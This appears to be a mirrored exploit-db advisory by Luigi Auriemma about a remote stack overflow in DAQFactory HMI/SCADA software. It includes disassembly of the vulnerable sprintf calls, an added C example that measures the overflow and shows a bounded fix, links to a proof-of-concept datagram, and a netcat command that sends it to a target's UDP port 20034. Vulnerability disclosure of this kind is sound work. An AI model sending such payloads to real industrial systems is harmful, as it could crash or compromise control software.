DaqFactory 5.85 build 1853 - Stack Overflow

Reported by Luigi Auriemma, 14 Sep 2011. Source: exploitdb (www.exploit-db.com).

#######################################################################

                             Luigi Auriemma

Application:  DAQFactory
              http://www.azeotech.com/daqfactory.php
Versions:     <= 5.85 build 1853
Platforms:    Windows
Bug:          stack overflow
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


DAQFactory is HMI/SCADA software.


#######################################################################

======
2) Bug
======


When DAQFactory is running it listens on UDP port 20034 for NETB
packets of at most 0x400 bytes.

The software is affected by a stack overflow in the code that logs the
information of the incoming packet, allowing an attacker to execute
malicious code. Both sprintf calls below write into a fixed-size buffer
on the stack (ESP+17C and ESP+16C inside a frame of 0x22C bytes) with no
length check; the numeric conversions have bounded width, so the overflow
comes through the two trailing %s arguments taken from the packet:

  005C3FB0  /$ 6A FF             PUSH -1
  005C3FB2  |. 68 E6777D00       PUSH DAQFacto.007D77E6
  005C3FB7  |. 64:A1 00000000    MOV EAX,DWORD PTR FS:[0]
  005C3FBD  |. 50                PUSH EAX
  005C3FBE  |. 64:8925 00000000  MOV DWORD PTR FS:[0],ESP
  005C3FC5  |. 81EC 2C020000     SUB ESP,22C
  ...skip...
  005C41B2  |. 8D8C24 7C010000   LEA ECX,DWORD PTR SS:[ESP+17C]
  005C41B9  |. 68 B02C9000       PUSH DAQFacto.00902CB0     ; "MAC:[%02x-%02X-%02X-%02X-%02X-%02X] IP:%d.%d.%d.%d DHCP:%d.%d.%d.%d %s%s"
  005C41BE  |. 51                PUSH ECX
  005C41BF  |. FF15 6CC07F00     CALL DWORD PTR DS:[<&MSVCRT.sprintf>]
  ..and..
  005C423A  |. 8D8C24 6C010000   LEA ECX,DWORD PTR SS:[ESP+16C]
  005C4241  |. 68 682C9000       PUSH DAQFacto.00902C68     ; "MAC: [%02x-%02X-%02X-%02X-%02X-%02X]    IP:%d.%d.%d.%d %s%s"
  005C4246  |. 51                PUSH ECX
  005C4247  |. FF15 6CC07F00     CALL DWORD PTR DS:[<&MSVCRT.sprintf>]
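As an added illustration (not DAQFactory's code and not from the advisory), the C program below models the pattern in the listing. The format string is copied verbatim from 00902CB0; everything else is an assumption: the buffer size (0xB0 bytes, the distance from ESP+17C to the top of the 0x22C-byte frame, so an upper bound on the real buffer), the field struct standing in for the packet-derived values, and the helper names. It computes how much an unbounded sprintf() would write for a given set of fields, flags the case where that exceeds the buffer, and shows the bounded snprintf() replacement that treats truncation as an error instead of logging silently.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Format string as it appears at 00902CB0 in the disassembly above. */
#define NETB_LOG_FMT \
    "MAC:[%02x-%02X-%02X-%02X-%02X-%02X] IP:%d.%d.%d.%d DHCP:%d.%d.%d.%d %s%s"

/* ASSUMPTION: the advisory does not state the buffer size.  0xB0 is the
 * distance from the buffer at ESP+17C to the top of the 0x22C-byte frame,
 * so the real buffer can be no larger than this. */
#define LOG_BUF_SIZE 0xB0

/* ASSUMPTION: hypothetical stand-in for the values the logging code pulls
 * out of a NETB packet; the real packet layout is not described. */
typedef struct {
    uint8_t     mac[6];
    uint8_t     ip[4];
    uint8_t     dhcp[4];
    const char *s1;   /* taken from the packet, length not validated */
    const char *s2;   /* taken from the packet, length not validated */
} netb_fields;

#define NETB_ARGS(f) \
    (f)->mac[0], (f)->mac[1], (f)->mac[2], (f)->mac[3], (f)->mac[4], (f)->mac[5], \
    (f)->ip[0], (f)->ip[1], (f)->ip[2], (f)->ip[3], \
    (f)->dhcp[0], (f)->dhcp[1], (f)->dhcp[2], (f)->dhcp[3], \
    (f)->s1, (f)->s2

/* Number of bytes (excluding the NUL) that the unbounded sprintf() in the
 * vulnerable routine would write for these fields. */
size_t netb_log_len(const netb_fields *f)
{
    int n = snprintf(NULL, 0, NETB_LOG_FMT, NETB_ARGS(f));
    return n < 0 ? 0 : (size_t)n;
}

/* True when sprintf() into a LOG_BUF_SIZE-byte stack buffer would run past
 * its end.  The numeric conversions are bounded (at most 17 + 15 + 15
 * characters), so only s1/s2 can push the result over the limit. */
bool netb_log_would_overflow(const netb_fields *f)
{
    return netb_log_len(f) + 1 > LOG_BUF_SIZE;
}

/* Hardened replacement: bounded write, and a truncated message is treated
 * as an error rather than logged silently.  Returns length written or -1. */
int netb_log_safe(const netb_fields *f, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, NETB_LOG_FMT, NETB_ARGS(f));
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz) out[0] = '\0';
        return -1;
    }
    return n;
}

/* Constructed sample fields (not captured traffic). */
netb_fields sample_fields(const char *s1, const char *s2)
{
    netb_fields f = {
        {0x00, 0x11, 0x22, 0x33, 0x44, 0x55},
        {192, 168, 1, 10},
        {192, 168, 1, 1},
        s1, s2
    };
    return f;
}

/* A run of n 'A' bytes, capped at the 0x400-byte maximum NETB packet. */
const char *filler(size_t n)
{
    static char buf[0x400 + 1];
    if (n > 0x400) n = 0x400;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    char out[LOG_BUF_SIZE];
    netb_fields ok  = sample_fields("host", "");
    netb_fields bad = sample_fields(filler(300), "");

    printf("short : %zu bytes, overflow=%d, safe=%d\n",
           netb_log_len(&ok), netb_log_would_overflow(&ok),
           netb_log_safe(&ok, out, sizeof out));
    printf("300xA : %zu bytes, overflow=%d, safe=%d\n",
           netb_log_len(&bad), netb_log_would_overflow(&bad),
           netb_log_safe(&bad, out, sizeof out));
    return 0;
}
```

The point of the bounded variant is not only the size argument: a caller that ignores snprintf()'s return value still logs a silently truncated line, so the return value is checked and a too-long message is rejected.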


#######################################################################

===========
3) The Code
===========


The proof-of-concept is a raw NETB datagram:

http://aluigi.org/poc/daqfactory_1.dat
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17841.dat

Send it to the target with netcat in UDP mode (-u):

  nc SERVER 20034 -u < daqfactory_1.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
